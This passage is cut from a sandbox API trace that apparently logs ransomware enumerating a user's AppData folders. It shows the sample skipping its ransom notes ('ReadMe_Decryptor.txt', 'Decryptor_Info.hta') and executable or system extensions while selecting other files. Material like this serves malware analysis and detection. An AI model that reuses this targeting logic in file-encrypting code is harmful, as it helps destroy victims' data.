ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x89f54240, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0083.224] lstrcmpW (lpString1="Preferred", lpString2=".") returned 1 [0083.224] lstrcmpW (lpString1="Preferred", lpString2="..") returned 1 [0083.224] lstrcmpiW (lpString1="Preferred", lpString2="ReadMe_Decryptor.txt") returned -1 [0083.224] lstrcmpiW (lpString1="Preferred", lpString2="Decryptor_Info.hta") returned 1 [0083.224] PathFindExtensionW (pszPath="Preferred") returned="" [0083.224] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0083.224] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0083.224] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0083.224] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0083.224] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0083.224] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x542fc610, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x542fc610, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x89f54240, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 0 [0083.225] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0083.226] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x2b1e4b40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b1e4b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x36031920, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 1 [0083.226] lstrcmpW (lpString1="SYNCHIST", lpString2=".") returned 1 [0083.226] lstrcmpW (lpString1="SYNCHIST", lpString2="..") returned 1 [0083.226] lstrcmpiW (lpString1="SYNCHIST", lpString2="ReadMe_Decryptor.txt") returned 1 [0083.226] lstrcmpiW (lpString1="SYNCHIST", lpString2="Decryptor_Info.hta") returned 1 [0083.226] PathFindExtensionW (pszPath="SYNCHIST") returned="" [0083.226] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0083.226] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0083.226] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0083.227] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0083.227] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0083.227] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x2b1e4b40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b1e4b40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x36031920, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SYNCHIST", cAlternateFileName="")) returned 0 [0083.227] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0083.227] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43bcc750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x43bcc750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x43bcc750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher", cAlternateFileName="PUBLIS~1")) returned 1 [0083.227] lstrcmpW (lpString1="Publisher", lpString2=".") returned 1 [0083.227] lstrcmpW (lpString1="Publisher", lpString2="..") returned 1 [0083.227] lstrlenW (lpString="Publisher") returned 9 [0083.227] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Publisher" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher" [0083.227] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\" [0083.227] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\") returned 66 [0083.227] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0083.469] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.469] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43bcc750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x43bcc750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x43bcc750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.470] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.470] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.471] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x43bcc750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x43bcc750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x43bcc750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0083.471] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0083.471] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbec39d0, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0xbec39d0, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publisher Building Blocks", cAlternateFileName="PUBLIS~2")) returned 1 [0083.471] lstrcmpW (lpString1="Publisher Building Blocks", lpString2=".") returned 1 [0083.471] lstrcmpW (lpString1="Publisher Building Blocks", lpString2="..") returned 1 [0083.471] lstrlenW (lpString="Publisher Building Blocks") returned 25 [0083.471] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Publisher Building Blocks" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks" [0083.471] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\" [0083.471] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\") returned 82 [0083.471] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0083.488] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.488] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xbec39d0, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0xbec39d0, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.490] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.490] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.490] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4bb4c1b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbec39d0, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ContentStore.xml", cAlternateFileName="CONTEN~1.XML")) returned 1 [0083.490] lstrcmpW (lpString1="ContentStore.xml", lpString2=".") returned 1 [0083.490] lstrcmpW (lpString1="ContentStore.xml", lpString2="..") returned 1 [0083.490] lstrcmpiW (lpString1="ContentStore.xml", lpString2="ReadMe_Decryptor.txt") returned -1 [0083.490] lstrcmpiW (lpString1="ContentStore.xml", lpString2="Decryptor_Info.hta") returned -1 [0083.490] PathFindExtensionW (pszPath="ContentStore.xml") returned=".xml" [0083.490] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0083.490] lstrcmpiW (lpString1=".xml", lpString2=".sys") returned 1 [0083.490] lstrcmpiW (lpString1=".xml", lpString2=".lnk") returned 1 [0083.490] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0083.490] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0083.490] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9700 [0083.490] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x77cf48 [0083.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9700 | out: hHeap=0x6d0000) returned 1 [0083.491] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd0) returned 0x77cd18 [0083.491] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77cf48 | out: hHeap=0x6d0000) returned 1 [0083.491] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4bb4c1b0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4bb4c1b0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xbec39d0, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0xa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ContentStore.xml", cAlternateFileName="CONTEN~1.XML")) returned 0 [0083.491] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0083.491] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Speech", cAlternateFileName="")) returned 1 [0083.491] lstrcmpW (lpString1="Speech", lpString2=".") returned 1 [0083.491] lstrcmpW (lpString1="Speech", lpString2="..") returned 1 [0083.491] lstrlenW (lpString="Speech") returned 6 [0083.491] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Speech" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech" [0083.491] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\" [0083.492] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\") returned 63 [0083.492] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Speech\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0083.493] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.493] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.495] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.495] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.495] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0083.495] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0083.495] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0083.495] lstrcmpW (lpString1="SystemCertificates", lpString2=".") returned 1 [0083.495] lstrcmpW (lpString1="SystemCertificates", lpString2="..") returned 1 [0083.495] lstrlenW (lpString="SystemCertificates") returned 18 [0083.495] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="SystemCertificates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0083.495] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\" [0083.496] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\") returned 75 [0083.496] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0083.498] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.498] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.499] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.499] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.499] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="My", cAlternateFileName="")) returned 1 [0083.499] lstrcmpW (lpString1="My", lpString2=".") returned 1 [0083.500] lstrcmpW (lpString1="My", lpString2="..") returned 1 [0083.500] lstrlenW (lpString="My") returned 2 [0083.500] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="My" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0083.500] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\" [0083.500] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\") returned 78 [0083.500] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0083.500] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.500] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.503] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.503] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.503] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Certificates", cAlternateFileName="CERTIF~1")) returned 1 [0083.503] lstrcmpW (lpString1="Certificates", lpString2=".") returned 1 [0083.503] lstrcmpW (lpString1="Certificates", lpString2="..") returned 1 [0083.503] lstrlenW (lpString="Certificates") returned 12 [0083.504] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="Certificates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0083.504] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\" [0083.504] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\") returned 91 [0083.504] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0083.504] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.504] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.505] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.505] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.505] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0083.506] FindClose (in: hFindFile=0x72a920 | out: hFindFile=0x72a920) returned 1 [0083.506] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CRLs", cAlternateFileName="")) returned 1 [0083.506] lstrcmpW (lpString1="CRLs", lpString2=".") returned 1 [0083.506] lstrcmpW (lpString1="CRLs", lpString2="..") returned 1 [0083.506] lstrlenW (lpString="CRLs") returned 4 [0083.506] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="CRLs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0083.506] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\" [0083.506] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\") returned 83 [0083.506] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a920 [0083.508] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.508] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.621] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.621] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.621] FindNextFileW (in: hFindFile=0x72a920, lpFindFileData=0xcce128 | out: 